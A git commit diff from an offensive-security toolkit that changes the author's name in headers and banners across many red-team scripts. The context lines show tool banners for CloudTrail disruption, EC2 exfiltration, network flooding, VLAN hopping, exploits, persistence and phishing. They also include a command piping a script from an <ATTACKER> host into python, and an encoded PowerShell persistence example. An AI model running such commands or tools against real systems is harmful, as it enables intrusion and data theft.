This commit is contained in:
Mariusz B. / mgeeky 2021-10-24 23:11:42 +02:00
parent 2e115fe796
commit 558762a498
78 changed files with 124 additions and 124 deletions

View File

@ -36,6 +36,6 @@ This and other projects are outcome of sleepless nights and **plenty of hard wor
--- ---
``` ```
Mariusz B. / mgeeky, (@mariuszbit) Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com> <mb [at] binary-offensive.com>
``` ```

View File

@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help
:: AWS CloudTrail disruption via S3 Put notification to Lambda :: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name] usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX
:: AWS CloudTrail disruption via S3 Put notification to Lambda :: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Will be working on Account ID: 712800000000 [.] Will be working on Account ID: 712800000000
[.] Step 1: Determine trail to disrupt [.] Step 1: Determine trail to disrupt
@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help
:: exfiltrate-ec2 :: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE] usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY] [--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default -
:: exfiltrate-ec2 :: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Using attacker's profile: default [.] Using attacker's profile: default
[.] Using victim's profile: victim-profile [.] Using victim's profile: victim-profile

View File

@ -3,7 +3,7 @@
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order # This script simply calls `aws sts assume-role` using hardcoded parameters, in order
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format. # to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
# #
# Mariusz B., mgeeky '19-20 # Mariusz Banach, mgeeky '19-20
# #

View File

@ -38,7 +38,7 @@
# - boto3 # - boto3
# - pytest # - pytest
# #
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com> # Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
# #
@ -427,7 +427,7 @@ def parseOptions(argv):
print(''' print('''
:: AWS CloudTrail disruption via S3 Put notification to Lambda :: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''') ''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')

View File

@ -5,7 +5,7 @@
# policy statements. Then goes through allowed permissions to pick all of them out. # policy statements. Then goes through allowed permissions to pick all of them out.
# Finally, checks every allowed permission against a list of known troublesome ones. # Finally, checks every allowed permission against a list of known troublesome ones.
# #
# Mariusz B., mgeeky '19, <mb@binary-offensive.com> # Mariusz Banach, mgeeky '19, <mb@binary-offensive.com>
# v0.1 # v0.1
# #

View File

@ -33,7 +33,7 @@
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is # WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests # not recommended to use it during legal AWS Penetration Tests
# #
# Author: Mariusz B. / mgeeky, '19, <mb@binary-offensive.com> # Author: Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
# #
import sys import sys
@ -422,7 +422,7 @@ def parseOptions(argv):
print(''' print('''
:: exfiltrate-ec2 :: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''') ''')
parser = argparse.ArgumentParser(prog = argv[0]) parser = argparse.ArgumentParser(prog = argv[0])

View File

@ -9,7 +9,7 @@
# #
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python # $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
# #
# Author: Mariusz B., '19, <mb@binary-offensive.com> # Author: Mariusz Banach, '19, <mb@binary-offensive.com>
# #
import zipfile, StringIO import zipfile, StringIO

View File

@ -3,7 +3,7 @@
# This script leverages couple of methods in order to validate that passed # This script leverages couple of methods in order to validate that passed
# domain is a S3 bucket indeed. # domain is a S3 bucket indeed.
# #
# Mariusz B., 2019, <mb@binary-offensive.com> # Mariusz Banach, 2019, <mb@binary-offensive.com>
# #
require 'resolv' require 'resolv'
@ -245,7 +245,7 @@ def main(args)
puts %{ puts %{
:: Identifies AWS S3 Buckets via couple of methods :: Identifies AWS S3 Buckets via couple of methods
Mariusz B. 19', <mb@binary-offensive.com> Mariusz Banach 19', <mb@binary-offensive.com>
} }
if ARGV.length != 1 if ARGV.length != 1

View File

@ -20,7 +20,7 @@
# Requirements: # Requirements:
# - gem "aws-sdk-ec2" # - gem "aws-sdk-ec2"
# #
# Author: Mariusz B., '19, <mb@binary-offensive.com> # Author: Mariusz Banach, '19, <mb@binary-offensive.com>
# #
require 'aws-sdk-ec2' require 'aws-sdk-ec2'

View File

@ -8,7 +8,7 @@ c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
:: tamperUpx - a small utility that corrupts UPX-packed executables, :: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored. making them much harder to be decompressed & restored.
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
Step 1. Renaming UPX sections... Step 1. Renaming UPX sections...
Renamed UPX section (UPX0 ) => (.text) Renamed UPX section (UPX0 ) => (.text)

View File

@ -119,7 +119,7 @@ def main(argv):
:: tamperUpx - a small utility that corrupts UPX-packed executables, :: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored. making them much harder to be decompressed & restored.
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
''') ''')
if len(argv) < 2: if len(argv) < 2:

View File

@ -1,7 +1,7 @@
#!/bin/bash #!/bin/bash
# #
# OpenVAS automation script. # OpenVAS automation script.
# Mariusz B. / mgeeky, '17 # Mariusz Banach / mgeeky, '17
# v0.2 # v0.2
# #

View File

@ -13,7 +13,7 @@
# keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script # keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script
# - only tools that I've found useful at least once are landing in this script. # - only tools that I've found useful at least once are landing in this script.
# #
# Mariusz B., '18-'19 # Mariusz Banach, '18-'19
# #
# Well, entire Kali installation assume that we are normally working as root on our Kali. # Well, entire Kali installation assume that we are normally working as root on our Kali.

View File

@ -8,7 +8,7 @@
# Python requirements: # Python requirements:
# - scapy # - scapy
# #
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
# #
import sys import sys
@ -202,7 +202,7 @@ def parseOptions(argv):
print(''' print('''
:: CDP Flooding / Denial of Service tool :: CDP Flooding / Denial of Service tool
Floods the interface with fake, randomly generated CDP packets. Floods the interface with fake, randomly generated CDP packets.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))

View File

@ -6,7 +6,7 @@
# Python requirements: # Python requirements:
# - scapy # - scapy
# #
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
# #
import sys import sys
@ -122,7 +122,7 @@ def parseOptions(argv):
print(''' print('''
:: HSRP Flooding / Denial of Service tool :: HSRP Flooding / Denial of Service tool
Floods the interface with Active router Coup HSRP packets. Floods the interface with Active router Coup HSRP packets.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))

View File

@ -33,7 +33,7 @@ PS D:\> python3 .\exchangeRecon.py 10.10.10.9
:: Exchange Fingerprinter :: Exchange Fingerprinter
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.2 v0.2
[.] Probing for Exchange fingerprints... [.] Probing for Exchange fingerprints...
@ -141,7 +141,7 @@ bash $ python RoutingAttackKit.py
:: Routing Protocols Exploitation toolkit :: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.1 v0.1
Available attacks: Available attacks:
@ -157,7 +157,7 @@ bash # python RoutingAttackKit.py -t rip-fuzzer -v
:: Routing Protocols Exploitation toolkit :: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.1 v0.1
[.] Using 192.168.1.14 as local/spoof IP address [.] Using 192.168.1.14 as local/spoof IP address
@ -241,7 +241,7 @@ $ ./VLANHopperDTP.py --help
:: VLAN Hopping via DTP Trunk negotiation :: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky, '18 Mariusz Banach / mgeeky, '18
v0.3 v0.3
usage: ./VLANHopperDTP.py [options] usage: ./VLANHopperDTP.py [options]
@ -279,7 +279,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1
:: VLAN Hopping via DTP Trunk negotiation :: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky, '18 Mariusz Banach / mgeeky, '18
v0.2 v0.2
[+] VLAN Hopping IS possible. [+] VLAN Hopping IS possible.

View File

@ -13,7 +13,7 @@
# Python requirements: # Python requirements:
# - scapy # - scapy
# #
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
# #
import sys import sys
@ -618,7 +618,7 @@ def parseOptions(argv):
print(''' print('''
:: Routing Protocols Exploitation toolkit :: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))

View File

@ -39,7 +39,7 @@
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory # - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network # - Add functionality to auto-scan via arp-scan desired network
# #
# Mariusz B. / mgeeky, '18-19, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '18-19, <mb@binary-offensive.com>
# #
import os import os
@ -724,7 +724,7 @@ def parseOptions(argv):
print(''' print('''
:: VLAN Hopping via DTP Trunk negotiation :: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18-19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18-19, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))

View File

@ -5,7 +5,7 @@
# the switch's port. This reconessaince will be helpful for performing # the switch's port. This reconessaince will be helpful for performing
# VLAN Hopping attacks. # VLAN Hopping attacks.
# #
# Mariusz B. / mgeeky, '18 # Mariusz Banach / mgeeky, '18
# #
import os import os

View File

@ -32,7 +32,7 @@
# - packaging # - packaging
# #
# Author: # Author:
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
# #
import re import re
@ -1300,7 +1300,7 @@ def parseOptions(argv):
print(''' print('''
:: Exchange Fingerprinter :: Exchange Fingerprinter
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))

View File

@ -6,7 +6,7 @@
# #
# Based on "Black Hat Python" book by Justin Seitz. # Based on "Black Hat Python" book by Justin Seitz.
# #
# Mariusz B. # Mariusz Banach
# #
import os import os

View File

@ -51,7 +51,7 @@ if __name__ == '__main__':
print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit' print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit'
print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)' print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)'
print '\tMariusz B. / mgeeky, 2016\n' print '\tMariusz Banach / mgeeky, 2016\n'
host = sys.argv[1] host = sys.argv[1]
if not host.startswith('http'): if not host.startswith('http'):

View File

@ -25,7 +25,7 @@
# Requirements: # Requirements:
# - paramiko # - paramiko
# #
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, <mb@binary-offensive.com>
# #
import sys import sys
@ -360,7 +360,7 @@ def main():
sys.stderr.write(''' sys.stderr.write('''
:: CVE-2018-10993 libSSH authentication bypass exploit. :: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication. Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))

View File

@ -5,7 +5,7 @@
# configuration files in order to extract plain and cipher passwords out of them. # configuration files in order to extract plain and cipher passwords out of them.
# Equipped with functionality to decrypt Cisco Type 7 passwords. # Equipped with functionality to decrypt Cisco Type 7 passwords.
# #
# Mariusz B., mgeeky '18-20 # Mariusz Banach, mgeeky '18-20
# #
import re import re
@ -427,7 +427,7 @@ def printResults():
def main(argv): def main(argv):
Logger._out(''' Logger._out('''
:: Network-configuration Credentials extraction script :: Network-configuration Credentials extraction script
Mariusz B. / mgeeky, '18 Mariusz Banach / mgeeky, '18
''') ''')
opts = parseOptions(argv) opts = parseOptions(argv)
if not opts: if not opts:

View File

@ -72,7 +72,7 @@
# - Microsoft Exchange Server 2013 # - Microsoft Exchange Server 2013
# #
# Author: # Author:
# Mariusz B. / mgeeky, '17-19, # Mariusz Banach / mgeeky, '17-19,
# <mb@binary-offensive.com> # <mb@binary-offensive.com>
# #
@ -2958,7 +2958,7 @@ Date: {dateNow}
smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool, smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool,
(https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa) (https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa)
by Mariusz B. / mgeeky (<mb@binary-offensive.com>) by Mariusz Banach / mgeeky (<mb@binary-offensive.com>)
. .
''' '''
@ -3698,7 +3698,7 @@ class ParseOptions:
def banner(): def banner():
sys.stderr.write(''' sys.stderr.write('''
:: SMTP Black-Box Audit tool. :: SMTP Black-Box Audit tool.
v{}, Mariusz B. / mgeeky, '17 v{}, Mariusz Banach / mgeeky, '17
'''.format(VERSION)) '''.format(VERSION))
@ -3828,7 +3828,7 @@ def main(argv):
sys.stderr.write(''' sys.stderr.write('''
:: SMTP configuration Audit / Penetration-testing tool :: SMTP configuration Audit / Penetration-testing tool
Intended to be used as a black-box tool revealing security state of SMTP. Intended to be used as a black-box tool revealing security state of SMTP.
Mariusz B. / mgeeky, '17-19 Mariusz Banach / mgeeky, '17-19
v{} v{}
'''.format(VERSION)) '''.format(VERSION))

View File

@ -3,7 +3,7 @@
# Simple script intended to abuse SMTP server's VRFY command to leak # Simple script intended to abuse SMTP server's VRFY command to leak
# usernames having accounts registered within it. # usernames having accounts registered within it.
# #
# Mariusz B., 2016 # Mariusz Banach, 2016
# #
import socket import socket

View File

@ -7,7 +7,7 @@
# Nothing fancy, just set of needed commands. Especially handy when # Nothing fancy, just set of needed commands. Especially handy when
# used with `startEAPHammer.sh` script. # used with `startEAPHammer.sh` script.
# #
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# #
if [ $# -ne 2 ]; then if [ $# -ne 2 ]; then

View File

@ -5,7 +5,7 @@
# that takes as input list of APs against which should deauth be launched, # that takes as input list of APs against which should deauth be launched,
# and then attempts that attack. # and then attempts that attack.
# #
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# #
if [ $# -ne 1 ]; then if [ $# -ne 1 ]; then

View File

@ -14,7 +14,7 @@
# Especially handy when used with companion script called: # Especially handy when used with companion script called:
# `initDHCPServer.sh` # `initDHCPServer.sh`
# #
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# #
#################################################################### ####################################################################

View File

@ -5,7 +5,7 @@ Create Contoso Users in Active Directory This script creates 270 + users in Acti
***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes*** ***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes***
***Modified by: Mariusz B., mb@binary-offensive.com - @mgeeky*** ***Modified by: Mariusz Banach, mb@binary-offensive.com - @mgeeky***
**To Use:** **To Use:**
Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt. Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt.

View File

@ -3,7 +3,7 @@
# with incoming OBEX Object Push requests containing # with incoming OBEX Object Push requests containing
# specified file. # specified file.
# #
# Mariusz B. / MGeeky, 16' # Mariusz Banach / MGeeky, 16'
# #
# Partially based on `Violent Python` snippets. # Partially based on `Violent Python` snippets.
# Modules required: # Modules required:
@ -79,7 +79,7 @@ def main():
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly') parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
print '\nBluetooth file carpet bombing via OBEX Object Push' print '\nBluetooth file carpet bombing via OBEX Object Push'
print 'Mariusz B. / MGeeky 16\n' print 'Mariusz Banach / MGeeky 16\n'
(opts, args) = parser.parse_args() (opts, args) = parser.parse_args()

View File

@ -14,7 +14,7 @@
# WILL RETURN: # WILL RETURN:
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123 # some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
# #
# Mariusz B. / mgeeky # Mariusz Banach / mgeeky
# #
import sys, os import sys, os

View File

@ -4,7 +4,7 @@
# In latter case producing encrypted ZIP package that will get decompressed automatically # In latter case producing encrypted ZIP package that will get decompressed automatically
# after decryption. # after decryption.
# #
# Mariusz B., 2016 v0.1 # Mariusz Banach, 2016 v0.1
# #
require 'optparse' require 'optparse'

View File

@ -11,7 +11,7 @@
# - scanning for other VMs # - scanning for other VMs
# - setting selected VM's IP address within /etc/hosts (and alike) file # - setting selected VM's IP address within /etc/hosts (and alike) file
# #
# Mariusz B. / mgeeky, '16-'19 # Mariusz Banach / mgeeky, '16-'19
# v0.7 # v0.7
# #

View File

@ -3,7 +3,7 @@
# Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length # Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length
# it searches for proper key that could decrypt cipher into text. # it searches for proper key that could decrypt cipher into text.
# #
# Mariusz B., 2016 # Mariusz Banach, 2016
# #
import sys import sys

View File

@ -15,7 +15,7 @@
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater") ' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
' '
' AUTHOR: ' AUTHOR:
' Mariusz B. / mgeeky, '17 ' Mariusz Banach / mgeeky, '17
' '
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean

View File

@ -45,7 +45,7 @@
# - packaging # - packaging
# - dnspython # - dnspython
# #
# Mariusz B. / mgeeky, '21 # Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com> # <mb [at] binary-offensive.com>
# #

View File

@ -37,7 +37,7 @@ PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml
:: GoPhish Single Mail Send utility :: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky Mariusz Banach / mgeeky
[+] Template to use: [+] Template to use:
ID: 22 ID: 22

View File

@ -165,7 +165,7 @@ def main(argv):
print(''' print('''
:: GoPhish Single Mail Send utility :: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky Mariusz Banach / mgeeky
''') ''')
template = getTemplate() template = getTemplate()

View File

@ -205,7 +205,7 @@ def main(argv):
print(''' print('''
:: Phishing HTML Linter :: Phishing HTML Linter
Shows you bad smells in your HTML code that will get your mails busted! Shows you bad smells in your HTML code that will get your mails busted!
Mariusz B. / mgeeky Mariusz Banach / mgeeky
''') ''')
html = '' html = ''

View File

@ -19,7 +19,7 @@
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater" ' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
' '
' AUTHOR: ' AUTHOR:
' Mariusz B. / mgeeky, '17 ' Mariusz Banach / mgeeky, '17
' '
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean

View File

@ -100,7 +100,7 @@ function Bypass-CLM
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM" Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
Write-Host "`t(implementation of: @xpn's technique, as documented in:)" Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)" Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
Write-Host "`n`tRe-implemented, enhanced by: Mariusz B., mgeeky" Write-Host "`n`tRe-implemented, enhanced by: Mariusz Banach, mgeeky"
Write-Host "`t-----`n" Write-Host "`t-----`n"
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath" Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"

File diff suppressed because one or more lines are too long

View File

@ -2,7 +2,7 @@
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to * This DLL hosts CLR4 environment from within a native binary. This way it is possible to
* call .NET APIs from an unmanaged runtime. * call .NET APIs from an unmanaged runtime.
* *
* Mariusz B., mgeeky, 19' * Mariusz Banach, mgeeky, 19'
* *
**/ **/

View File

@ -26,7 +26,7 @@ PS > .\Bypass-CLM.ps1
(implementation of: @xpn's technique, as documented in:) (implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/) (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz B., mgeeky Re-implemented, enhanced by: Mariusz Banach, mgeeky
----- -----
[.] Step 0. Planted DLL files in: [.] Step 0. Planted DLL files in:

View File

@ -22,7 +22,7 @@ The script offers subcommands-kind of CLI interface, so after every command one
PS> py .\c3-client.py --help PS> py .\c3-client.py --help
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: usage:
Usage: ./c3-client.py [options] <host> <command> [...] Usage: ./c3-client.py [options] <host> <command> [...]
@ -59,7 +59,7 @@ optional arguments:
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id] usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id]
@ -144,7 +144,7 @@ This example shows how to keep all of your Relays pinged every 45 seconds:
PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45 PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] Sending a ping every 45 seconds. [.] Sending a ping every 45 seconds.
[.] Pinged relay: matter4 from gateway gate4 [.] Pinged relay: matter4 from gateway gate4
@ -170,7 +170,7 @@ Ever suffered from a poor C3 bandwidth or general performance? Worry not - you c
PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear
:: C3 Client - a lightweight automated companion with C3 voyages :: C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] LDAP: Clearing messages queue... [.] LDAP: Clearing messages queue...
[+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4 [+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4
@ -213,7 +213,7 @@ In this example setup an alarm that triggers upon new Relay checking-in. Wheneve
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`"" PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`""
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] Entering infinite-loop awaiting for new Relays... [.] Entering infinite-loop awaiting for new Relays...
[+] New Relay checked-in! [+] New Relay checked-in!
@ -325,6 +325,6 @@ py c3-client.py http://192.168.0.200:52935 ping -k 45
## Author ## Author
``` ```
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com> <mb [at] binary-offensive.com>
``` ```

View File

@ -2036,7 +2036,7 @@ def parseArgs(argv):
def main(argv): def main(argv):
print(''' print('''
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''') ''')
parseArgs(argv) parseArgs(argv)

View File

@ -8,7 +8,7 @@
PS> . .\Count-PrivilegedGroupMembers.ps1 PS> . .\Count-PrivilegedGroupMembers.ps1
PS> Count-PrivilegedGroupMembers PS> Count-PrivilegedGroupMembers
Mariusz B. / mgeeky Mariusz Banach / mgeeky
#> #>
